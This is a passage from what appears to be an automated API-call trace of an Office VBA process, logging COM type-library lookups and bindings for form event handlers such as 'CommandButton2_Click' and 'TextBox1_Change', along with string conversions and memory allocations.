0x12 [0041.976] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Click", lHashVal=0x10e38a, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.976] IUnknown:Release (This=0x6992850) returned 0x11 [0041.976] IUnknown:AddRef (This=0x6992df0) returned 0xd [0041.976] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Click", lHashVal=0x10e38a, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=0, pBstrLibName=0x1844d0) returned 0x0 [0041.976] IUnknown:Release (This=0x6992df0) returned 0xc [0041.976] IUnknown:AddRef (This=0x6992580) returned 0x7 [0041.976] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="Click", lHashVal=0x10e38a, pfName=0x1845a0, pBstrLibName=0x1844d0 | out: pfName=0x1845a0*=1, pBstrLibName=0x1844d0) returned 0x0 [0041.977] IUnknown:Release (This=0x6992580) returned 0x6 [0041.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Click", cchWideChar=-1, lpMultiByteStr=0x184680, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Click", lpUsedDefaultChar=0x0) returned 6 [0041.977] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Click") returned 0x10e38a [0041.977] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184738 | out: ppvObject=0x184738*=0x0) returned 0x80004002 [0041.977] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184740 | out: ppvObject=0x184740*=0x0) returned 0x80004002 [0041.977] ITypeInfo:GetTypeComp (in: This=0x6cef280, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6cef288) returned 0x0 [0041.977] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6880670 [0041.977] IUnknown:AddRef (This=0x6cef288) returned 0x5 [0041.977] IUnknown:Release (This=0x6cef288) returned 0x4 [0041.977] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0e2a0, cb=0xc0) returned 0x6c2d710 [0041.977] IUnknown:Release (This=0x6cef280) returned 0x3 [0041.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050656, cbMultiByte=6, lpWideCharStr=0x184530, cchWideChar=7 | out: lpWideCharStr="Click") returned 6 [0041.977] ITypeComp:RemoteBind (in: This=0x6cef288, szName="Click", lHashVal=0x10e38a, wFlags=0x1, ppTInfo=0x1844e8, pDescKind=0x1844fc, ppFuncDesc=0x184500, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1844e8*=0x6cef280, pDescKind=0x1844fc*=1, ppFuncDesc=0x184500, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.977] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef280, ppTypeAttr=0x1844f0, pDummy=0x1 | out: ppTypeAttr=0x1844f0, pDummy=0x1) returned 0x0 [0041.977] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef280) returned 0x0 [0041.977] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9cf10, cb=0x100) returned 0x6d26d20 [0041.977] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184350 | out: ppvObject=0x184350*=0x6cef280) returned 0x0 [0041.977] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6cef280, memid=-600, invkind=1, pFuncIndex=0x184390 | out: pFuncIndex=0x184390*=0x2) returned 0x0 [0041.977] ITypeInfo2:GetFuncCustData (in: This=0x6cef280, index=0x2, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1843a8 | out: pVarVal=0x1843a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x184450, varVal2=0x6b7edd8)) returned 0x0 [0041.977] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.977] IUnknown:AddRef (This=0x6cef280) returned 0x5 [0041.977] ITypeInfo:LocalReleaseFuncDesc (This=0x6cef280) returned 0x0 [0041.977] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.977] IUnknown:QueryInterface (in: This=0x6cef280, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1845a8 | out: ppvObject=0x1845a8*=0x0) returned 0x80004002 [0041.977] IUnknown:AddRef (This=0x6cef280) returned 0x5 [0041.977] IMalloc:Realloc (This=0x7feffc15380, pv=0x6d26c10, cb=0x200) returned 0x6cb9090 [0041.977] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.977] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c82, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="ValidText_Change") returned 17 [0041.977] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.977] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="ValidText_Change", lHashVal=0x10bee5, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xffffffff00000000, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xffffffff00000000, pDummy=0x0) returned 0x0 [0041.978] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2c82, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="ValidText_Change") returned 17 [0041.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ValidText_Change", cchWideChar=-1, lpMultiByteStr=0x184600, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ValidText_Change", lpUsedDefaultChar=0x0) returned 17 [0041.978] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x38a2c82 | out: _Dst=0x184820) returned 0x0 [0041.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.978] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x18482a | out: _Dst=0x184820) returned 0x0 [0041.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.978] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.978] IUnknown:AddRef (This=0x6ceefc0) returned 0x9 [0041.978] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.978] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d82, cbMultiByte=21, lpWideCharStr=0x1847e0, cchWideChar=42 | out: lpWideCharStr="CommandButton2_Click") returned 21 [0041.978] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.978] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="CommandButton2_Click", lHashVal=0x10f9f4, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xa00000000, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xa00000000, pDummy=0x0) returned 0x0 [0041.978] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d82, cbMultiByte=21, lpWideCharStr=0x1847e0, cchWideChar=42 | out: lpWideCharStr="CommandButton2_Click") returned 21 [0041.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommandButton2_Click", cchWideChar=-1, lpMultiByteStr=0x184600, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommandButton2_Click", lpUsedDefaultChar=0x0) returned 21 [0041.978] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x15, _Src=0x38a2d82 | out: _Dst=0x184820) returned 0x0 [0041.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CommandButton2") returned 0x10d47d [0041.978] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x15, _Src=0x18482f | out: _Dst=0x184820) returned 0x0 [0041.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Click") returned 0x10e38a [0041.978] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.978] IUnknown:AddRef (This=0x6cef280) returned 0x5 [0041.978] IUnknown:Release (This=0x6cef280) returned 0x4 [0041.978] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2dba, cbMultiByte=16, lpWideCharStr=0x1847e0, cchWideChar=32 | out: lpWideCharStr="TextBox1_Change") returned 16 [0041.978] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.979] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="TextBox1_Change", lHashVal=0x10e73d, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xb00000000, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xb00000000, pDummy=0x0) returned 0x0 [0041.979] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2dba, cbMultiByte=16, lpWideCharStr=0x1847e0, cchWideChar=32 | out: lpWideCharStr="TextBox1_Change") returned 16 [0041.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox1_Change", cchWideChar=-1, lpMultiByteStr=0x184610, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox1_Change", lpUsedDefaultChar=0x0) returned 16 [0041.979] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x10, _Src=0x38a2dba | out: _Dst=0x184820) returned 0x0 [0041.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.979] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x10, _Src=0x184829 | out: _Dst=0x184820) returned 0x0 [0041.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.979] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.979] IUnknown:AddRef (This=0x6ceefc0) returned 0x9 [0041.979] IUnknown:Release (This=0x6ceefc0) returned 0x8 [0041.979] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184760 | out: ppvObject=0x184760*=0x0) returned 0x80004002 [0041.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e66, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="ComboBox1_Change") returned 17 [0041.979] ITypeInfo:GetTypeComp (in: This=0x6a6e948, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6a6e950) returned 0x0 [0041.979] ITypeComp:RemoteBind (in: This=0x6a6e950, szName="ComboBox1_Change", lHashVal=0x106108, wFlags=0x0, ppTInfo=0x184738, pDescKind=0x184758, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xa00000000, pDummy=0x0 | out: ppTInfo=0x184738*=0x0, pDescKind=0x184758*=0, ppFuncDesc=0x184778, ppVarDesc=0x0, ppTypeComp=0xa00000000, pDummy=0x0) returned 0x0 [0041.979] IUnknown:Release (This=0x6a6e950) returned 0x4 [0041.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2e66, cbMultiByte=17, lpWideCharStr=0x1847e0, cchWideChar=34 | out: lpWideCharStr="ComboBox1_Change") returned 17 [0041.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComboBox1_Change", cchWideChar=-1, lpMultiByteStr=0x184600, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComboBox1_Change", lpUsedDefaultChar=0x0) returned 17 [0041.979] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x38a2e66 | out: _Dst=0x184820) returned 0x0 [0041.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1") returned 0x10d827 [0041.979] _mbscpy_s (in: _Dst=0x184820, _DstSizeInBytes=0x11, _Src=0x18482a | out: _Dst=0x184820) returned 0x0 [0041.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Change") returned 0x10c7a3 [0041.979] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184738 | out: ppvObject=0x184738*=0x0) returned 0x80004002 [0041.979] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184740 | out: ppvObject=0x184740*=0x0) returned 0x80004002 [0041.979] ITypeInfo:GetTypeComp (in: This=0x6cef120, ppTComp=0x184748 | out: ppTComp=0x184748*=0x6cef128) returned 0x0 [0041.980] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x68806b0 [0041.980] IUnknown:AddRef (This=0x6cef128) returned 0x4 [0041.980] IUnknown:Release (This=0x6cef128) returned 0x3 [0041.980] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c2d710, cb=0xd0) returned 0x6c7d840 [0041.980] IUnknown:Release (This=0x6cef120) returned 0x2 [0041.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505062e, cbMultiByte=7, lpWideCharStr=0x184530, cchWideChar=8 | out: lpWideCharStr="Change") returned 7 [0041.980] ITypeComp:RemoteBind (in: This=0x6cef128, szName="Change", lHashVal=0x10c7a3, wFlags=0x1, ppTInfo=0x1844e8, pDescKind=0x1844fc, ppFuncDesc=0x184500, ppVarDesc=0x106108, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1844e8*=0x6cef120, pDescKind=0x1844fc*=1, ppFuncDesc=0x184500, ppVarDesc=0x106108, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.980] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x1844f0, pDummy=0x1 | out: ppTypeAttr=0x1844f0, pDummy=0x1) returned 0x0 [0041.980] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.980] IMalloc:Realloc (This=0x7feffc15380, pv=0x6d26d20, cb=0x200) returned 0x6cb92a0 [0041.980] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184350 | out: ppvObject=0x184350*=0x6cef120) returned 0x0 [0041.980] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6cef120, memid=2, invkind=1, pFuncIndex=0x184390 | out: pFuncIndex=0x184390*=0x2) returned 0x0 [0041.980] ITypeInfo2:GetFuncCustData (in: This=0x6cef120, index=0x2, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1843a8 | out: pVarVal=0x1843a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x184450, varVal2=0x6b7edd8)) returned 0x0 [0041.980] IUnknown:Release (This=0x6cef120) returned 0x3 [0041.980] IUnknown:AddRef (This=0x6cef120) returned 0x4 [0041.980] ITypeInfo:LocalReleaseFuncDesc (This=0x6cef120) returned 0x0 [0041.980] IUnknown:Release (This=0x6cef120) returned 0x3 [0041.980] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1845a8 | out: ppvObject=0x1845a8*=0x0) returned 0x80004002 [0041.980] IUnknown:AddRef (This=0x6cef120) returned 0x4 [0041.980] IUnknown:Release (This=0x6cef120) returned 0x3 [0041.980] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.980] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e9a8, ppTypeAttr=0x184828, pDummy=0x69d6b10 | out: ppTypeAttr=0x184828, pDummy=0x69d6b10*=0x69d0007) returned 0x0 [0041.980] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e9a8) returned 0x0 [0041.980] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.980] CoCreateGuid (in: pguid=0x1849e0 | out: pguid=0x1849e0*(Data1=0x106271fb, Data2=0xc4e0, Data3=0x4890, Data4=([0]=0xa1, [1]=0xc2, [2]=0x4e, [3]=0xcc, [4]=0x77, [5]=0x54, [6]=0xb2, [7]=0x5a))) returned 0x0 [0041.980] CoCreateGuid (in: pguid=0x1849e0 | out: pguid=0x1849e0*(Data1=0xf02c8440, Data2=0x6e5, Data3=0x499b, Data4=([0]=0x90, [1]=0x8d, [2]=0x3f, [3]=0xeb, [4]=0x58, [5]=0x7b, [6]=0x77, [7]=0x53))) returned 0x0 [0041.980] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c34690 [0041.980] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.980] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.980] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.980] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.980] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.980] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.981] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9ce80, cb=0x100) returned 0x6d26d20 [0041.981] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.981] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.981] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184b18 | out: ppvObject=0x184b18*=0x0) returned 0x80004002 [0041.981] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x183c90 | out: ppvObject=0x183c90*=0x0) returned 0x80004002 [0041.981] IUnknown:AddRef (This=0x6a6e948) returned 0x5 [0041.981] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x183ca8, pDummy=0x10 | out: ppTypeAttr=0x183ca8, pDummy=0x10) returned 0x0 [0041.981] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.981] IUnknown:Release (This=0x6a6e948) returned 0x4 [0041.981] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.981] IMalloc:Alloc (This=0x7feffc15380, cb=0x360) returned 0x6bae420 [0041.981] IMalloc:Alloc (This=0x7feffc15380, cb=0x3c0) returned 0x6a0b8b0 [0041.981] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x183c88, pDummy=0x183cc4 | out: ppTypeAttr=0x183c88, pDummy=0x183cc4*=0xffffffff) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x0, ppFuncDesc=0x183c80, pDummy=0x183cc8 | out: ppFuncDesc=0x183c80, pDummy=0x183cc8*=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x1, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x2, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x3, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x4, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x5, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x6, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x7, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x8, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x9, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xa, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xb, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xc, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xd, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xe, ppFuncDesc=0x183c80, pDummy=0xc0 | out: ppFuncDesc=0x183c80, pDummy=0xc0) returned 0x0 [0041.981] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.981] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0xf, ppFuncDesc=0x183c80, pDummy=0x140 | out: ppFuncDesc=0x183c80, pDummy=0x140) returned 0x0 [0041.982] ITypeInfo:LocalReleaseFuncDesc (This=0x6ccf078) returned 0x0 [0041.982] ITypeInfo:RemoteGetFuncDesc (in: This=0x6ccf078, index=0x10, ppFuncDesc=0x183c80, pDummy=0xc0 